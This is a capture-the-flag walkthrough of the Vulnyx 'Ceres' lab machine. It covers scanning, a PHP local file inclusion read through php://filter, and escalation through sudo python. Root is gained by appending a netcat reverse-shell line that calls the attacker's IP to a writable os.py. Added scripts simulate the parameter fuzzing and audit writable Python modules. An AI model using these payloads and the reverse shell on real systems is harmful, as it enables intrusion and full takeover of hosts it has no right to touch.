Vulnyx-Ceres-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.220 08:00:27:3b:f1:50 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.035 seconds (125.80 hosts/sec). 4 responded
export ip=192.168.60.220
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.220:22
Open 192.168.60.220:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 21:06 CST
Initiating ARP Ping Scan at 21:06
Scanning 192.168.60.220 [1 port]
Completed ARP Ping Scan at 21:06, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:06
Completed Parallel DNS resolution of 1 host. at 21:06, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:06
Scanning 192.168.60.220 [2 ports]
Discovered open port 80/tcp on 192.168.60.220
Discovered open port 22/tcp on 192.168.60.220
Completed SYN Stealth Scan at 21:06, 0.06s elapsed (2 total ports)
Nmap scan report for 192.168.60.220
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-03-01 21:06:42 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:3B:F1:50 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory scan

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.220
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 80]
/file.php (Status: 200) [Size: 0]
/secret.php (Status: 200) [Size: 54]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

index.html only contains an image, apparently of some planet; I am not sure which one.

[image: index.html page showing a planet]

I suspected image steganography, pulled the image with wget and tried, but it is only referenced from the CSS and nothing came of it.

Requesting /secret.php with curl returns the output of the id command:

❯ curl $ip/secret.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

LFI

I guessed file.php has an LFI, but after fuzzing parameter names for a long time it seemed not to:

❯ wfuzz -c -u "http://$ip/file.php?FUZZ=../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.220/file.php?FUZZ=../../../../etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


Total time: 101.8388
Processed Requests: 207643
Filtered Requests: 207643
Requests/sec.: 2038.936

Whatever parameter name is sent, the response stays empty (every request is filtered by --hw 0).

Next, try reading secret.php through the php://filter wrapper instead of a raw path.

(At this point I did not understand why the .php suffix must be left off the resource name; the source recovered later explains it.)

This reveals the parameter name: file.

❯ wfuzz -c -u "http://$ip/file.php?FUZZ=php://filter/convert.base64-encode/resource=secret" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.220/file.php?FUZZ=php://filter/convert.base64-encode/resource=secret
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000741: 200 0 L 1 W 88 Ch "file"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 13.44606
Processed Requests: 1492
Filtered Requests: 1491
Requests/sec.: 110.9618

Fetch it with curl and base64-decode it; the source contains a comment:

My_H1dd3n_S3cr3t

The id command is hard-coded in the script, which is why /secret.php always prints it:

❯ curl http://$ip/file.php\?file\=php://filter/convert.base64-encode/resource\=secret|base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 88 100 88 0 0 43010 0 --:--:-- --:--:-- --:--:-- 44000
<?php
system("id"); // /My_H1dd3n_S3cr3t
?>

The comment looks like a directory name.

Scanning it turns up another file.php:

❯ gobuster dir -u "http://$ip/My_H1dd3n_S3cr3t" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.220/My_H1dd3n_S3cr3t
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/file.php (Status: 200) [Size: 0]
Progress: 246441 / 1038220 (23.74%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 248154 / 1038220 (23.90%)
===============================================================
Finished
===============================================================

Fuzz the parameter name again.

Once more the parameter is file, and this time a raw path works: /etc/passwd comes back.

❯ wfuzz -c -u "http://192.168.60.220/My_H1dd3n_S3cr3t/file.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.220/My_H1dd3n_S3cr3t/file.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000741: 200 26 L 38 W 1404 Ch "file"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 37.39385
Processed Requests: 25810
Filtered Requests: 25809
Requests/sec.: 690.2203

This gives us the user giuseppe:

❯ curl http://192.168.60.220/My_H1dd3n_S3cr3t/file.php\?file\=/etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1404  100  1404    0     0   693k      0 --:--:-- --:--:-- --:--:-- 1371k
root:x:0:0:root:/root:/bin/bash
giuseppe:x:1000:1000:giuseppe,,,:/home/giuseppe:/bin/bash

Read the source of both scripts with the php://filter wrapper. The first decode below is /My_H1dd3n_S3cr3t/file.php (the 64-byte file seen later in the shell), which includes the parameter as-is; the second is the root /file.php.

The root file.php explains why no .php suffix was needed earlier: the code appends ".php" itself, so "../../../../etc/passwd" became "../../../../etc/passwd.php" and included nothing, while "php://filter/convert.base64-encode/resource=secret" became "...resource=secret.php" and the wrapper returned the real file.

echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydmaWxlJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg=="|base64 -d
<?php
$filename = $_GET['file'];
include($filename);
?>
echo "PD9waHAKICAgIGluY2x1ZGUoJF9HRVRbImZpbGUiXS4iLnBocCIpOwo/Pgo="|base64 -d
<?php
include($_GET["file"].".php");
?>
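The two include() variants above account for both fuzzing results. The following Python script is an added example written for this edit, not code from the original walkthrough or from the Ceres box: it models the root file.php as a function that appends ".php" exactly as the recovered source does, runs the same baseline-difference parameter discovery that wfuzz --hw 0 performed, and decodes the php://filter output. The virtual file contents, the candidate parameter list and the http_fetch URL are constructed assumptions for the demonstration; only the simulated target is exercised, nothing touches the network.

```python
import base64
import urllib.parse
import urllib.request

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="

# Constructed virtual web root standing in for the target. The secret.php body
# is the one the walkthrough recovered; this is a stand-in, not the real server.
_VFS = {
    "secret.php": '<?php\n    system("id"); // /My_H1dd3n_S3cr3t\n?>\n',
}
_ID_OUTPUT = "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"


def simulated_root_file_php(params):
    """Stand-in for the root /file.php: include($_GET["file"] . ".php").

    Because ".php" is appended to whatever arrives, "../../../../etc/passwd"
    becomes "../../../../etc/passwd.php" and includes nothing, while
    "php://filter/.../resource=secret" becomes "...resource=secret.php" and
    the wrapper base64-encodes the real file instead of executing it.
    """
    if "file" not in params:
        return ""
    target = params["file"] + ".php"
    if target.startswith(FILTER_PREFIX):
        src = _VFS.get(target[len(FILTER_PREFIX):])
        return base64.b64encode(src.encode()).decode() if src is not None else ""
    if target in _VFS:
        # include() of a plain .php executes it; only system("id") output is emitted
        return _ID_OUTPUT
    return ""  # include() of a missing file: warning hidden, empty body


def fuzz_param_names(fetch, candidates, payload):
    """Differential parameter discovery (what wfuzz --hw 0 did by hand).

    fetch(params) -> response body. A baseline is taken with a name that is
    certainly not the real one; every candidate whose body differs from that
    baseline is returned together with the body it produced.
    """
    baseline = fetch({"zz_no_such_param": payload})
    hits = []
    for name in candidates:
        body = fetch({name: payload})
        if body != baseline:
            hits.append((name, body))
    return hits


def read_source_via_filter(fetch, param, resource):
    """Read a PHP source file through convert.base64-encode and decode it."""
    return base64.b64decode(fetch({param: FILTER_PREFIX + resource})).decode()


def http_fetch(url):
    """Fetcher for a real lab target (assumed URL; not exercised here)."""
    def fetch(params):
        query = urllib.parse.urlencode(params)
        with urllib.request.urlopen(url + "?" + query, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return fetch


if __name__ == "__main__":
    names = ["id", "page", "path", "file", "include"]  # constructed candidate list
    # Raw traversal finds nothing, exactly as the first wfuzz run showed
    print(fuzz_param_names(simulated_root_file_php, names, "../../../../etc/passwd"))
    # The filter wrapper reveals the parameter name ...
    print(fuzz_param_names(simulated_root_file_php, names, FILTER_PREFIX + "secret"))
    # ... and the decoded source with its comment
    print(read_source_via_filter(simulated_root_file_php, "file", "secret"))
```

Against a real target, swap `simulated_root_file_php` for `http_fetch("http://192.168.60.220/file.php")` and a wordlist; the baseline-difference logic is the same. Note that the baseline must be taken with the same payload, otherwise a script that echoes its input would make every candidate look like a hit.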

RCE through php://filter chains

The include() with no suffix in /My_H1dd3n_S3cr3t/file.php can be turned into code execution with a php://filter chain; the technique is the same one used in the author's HackMyVM-Medusa-Walkthrough (Pepster's Blog), so it is not repeated here.

User privilege escalation

Send a reverse shell back to a listener.

There is a script under /opt.

And www-data has a sudo entry:

❯ pwncat-cs -lp 4444
[21:37:54] Welcome to pwncat 🐈! __main__.py:164
[21:41:53] received connection from 192.168.60.220:37774 bind.py:84
[21:41:54] 192.168.60.220:37774: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@ceres:/var/www/html/My_H1dd3n_S3cr3t$ ls -al
total 12
drwxr-xr-x 2 www-data www-data 4096 May 3 2023 .
drwxr-xr-x 3 www-data www-data 4096 May 3 2023 ..
-rw-r--r-- 1 www-data www-data 64 Mar 6 2021 file.php
(remote) www-data@ceres:/opt$ cat important.py
#!/usr/bin/python

import os

os.system('/usr/bin/id > /opt/id')
os.system('/usr/bin/sleep 15')
os.system('/usr/bin/rm /opt/id')
os.system('/usr/bin/sleep 15')
(remote) www-data@ceres:/opt$ sudo -l
Matching Defaults entries for www-data on ceres:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on ceres:
(giuseppe) NOPASSWD: /usr/bin/python

Escalate to giuseppe with the usual sudo python trick:

(remote) www-data@ceres:/opt$ sudo -u giuseppe /usr/bin/python -c  'import pty;pty.spawn("/bin/bash")'
giuseppe@ceres:/opt$ cd ~
giuseppe@ceres:~$ cat user.txt
16461eb65ce11cbabbe32cf1cf35a4f5

Upload pspy and watch the process list.

As expected, root runs /opt/important.py periodically from cron:

2025/03/01 14:47:01 CMD: UID=0 PID=1 | /sbin/init
2025/03/01 14:47:01 CMD: UID=0 PID=1786 | /usr/sbin/CRON -f
2025/03/01 14:47:01 CMD: UID=0 PID=1787 | /usr/sbin/CRON -f
2025/03/01 14:47:01 CMD: UID=0 PID=1788 | /bin/sh -c /opt/important.py
2025/03/01 14:47:01 CMD: UID=0 PID=1789 | /usr/bin/python /opt/important.py
2025/03/01 14:47:01 CMD: UID=0 PID=1790 | sh -c /usr/bin/id > /opt/id
2025/03/01 14:47:01 CMD: UID=0 PID=1792 | /usr/bin/sleep 15
2025/03/01 14:47:01 CMD: UID=0 PID=1791 | sh -c /usr/bin/sleep 15

Root privilege escalation

Python library hijacking

Look for files writable by giuseppe.

Python's own os.py turns out to be writable, and important.py imports os before doing anything else:

giuseppe@ceres:/opt$ find / -writable -type f 2>/dev/null |grep -Pv "proc|sys"
/home/giuseppe/.profile
/home/giuseppe/.bashrc
/home/giuseppe/.bash_logout
/tmp/pspy64
/usr/lib/python2.7/os.py
/var/log/apache2/access.log

Append a reverse-shell line to the end of os.py.

Since the payload lives inside os.py itself, it uses subprocess rather than os.system to run the command. It executes on every `import os`, so the next cron run of /opt/important.py as root fires it. Two caveats: every other process that imports os (including giuseppe's own python) will also try to connect back, so remove the line once root is obtained; and `nc -e` only works where the target's netcat supports it, as it does here.

For other library-hijack variants see Linux Privilege Escalation - HackTricks.

giuseppe@ceres:/tmp$ echo "import subprocess;subprocess.call(['nc', '-e','/bin/bash','192.168.60.100','4444'], shell=False)">> /usr/lib/python2.7/os.py
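Before writing to os.py, a pentester wants a repeatable way to find such files, and a defender wants the same check as a detection. The following Python script is an added example, not code from the original post or the Ceres box: it audits a sys.path-style list for module files and directories that a given uid/gid can modify using plain mode bits, and builds a constructed stand-in for the Ceres /usr/lib/python2.7 tree with a world-writable os.py to show what the finding looks like. The uid/gid values, the temporary tree and the placeholder module bodies are assumptions for the demonstration.

```python
import os
import stat
import sys
import tempfile


def writable_by(st, uid, gids):
    """Can a principal with this uid and these gids modify the file?

    Classic mode bits only; POSIX ACLs and capabilities are ignored, so treat
    a negative result as "probably not" rather than "never".
    """
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_module_paths(search_path, uid, gids):
    """Report module files and directories on a sys.path-style list that the
    given principal can write, as (path, reason) tuples.

    A writable .py is the Ceres case (code appended to os.py runs on the next
    import); a writable directory is just as bad, because a module dropped
    there shadows anything later on the path.
    """
    findings = []
    for d in search_path:
        if not os.path.isdir(d):
            continue
        if writable_by(os.stat(d), uid, gids):
            findings.append((d, "directory writable: a shadowing module can be dropped here"))
        for root, _dirs, files in os.walk(d):
            for f in files:
                if not f.endswith(".py"):
                    continue
                p = os.path.join(root, f)
                try:
                    st = os.stat(p)
                except OSError:
                    continue
                if writable_by(st, uid, gids):
                    findings.append((p, "module file writable: appended code runs on import"))
    return findings


def build_fixture():
    """Constructed stand-in for /usr/lib/python2.7 on Ceres: a world-writable
    os.py next to a correctly permissioned subprocess.py. Returns the directory."""
    lib = os.path.join(tempfile.mkdtemp(), "python2.7")
    os.mkdir(lib, 0o755)
    for name, mode in (("os.py", 0o666), ("subprocess.py", 0o644)):
        p = os.path.join(lib, name)
        with open(p, "w") as fh:
            fh.write("# placeholder module body (constructed)\n")
        os.chmod(p, mode)  # chmod ignores umask, so 0o666 really is world-writable
    return lib


if __name__ == "__main__":
    # Quick local check: the running interpreter's path, as the current user
    for path, why in audit_module_paths(sys.path, os.geteuid(), set(os.getgroups())):
        print(f"{path}: {why}")
    # The constructed Ceres-like tree, audited as an unprivileged uid 1000 / gid 1000
    for path, why in audit_module_paths([build_fixture()], 1000, {1000}):
        print(f"{path}: {why}")
```

Run it against the path of the interpreter the cron job actually uses (here /usr/bin/python, i.e. Python 2.7), not the one you happen to have in your shell. Any reported file that a root-run script imports is a root escalation; the fix on Ceres is restoring 0644 on os.py, and `dpkg --verify` will flag the modified contents of a package-owned file like this one.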

Listen on the port; when cron runs important.py, a root shell comes back:

❯ pwncat-cs -lp 4444
[22:46:15] Welcome to pwncat 🐈! __main__.py:164
[22:46:59] received connection from 192.168.60.220:37782 bind.py:84
[22:47:00] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to manager.py:957
/usr/bin/bash
192.168.60.220:37782: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@ceres:/root# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@ceres:/root# cat /root/root.txt
fb41c2cb45f8b4ee387fabac849d6449
(remote) root@ceres:/root#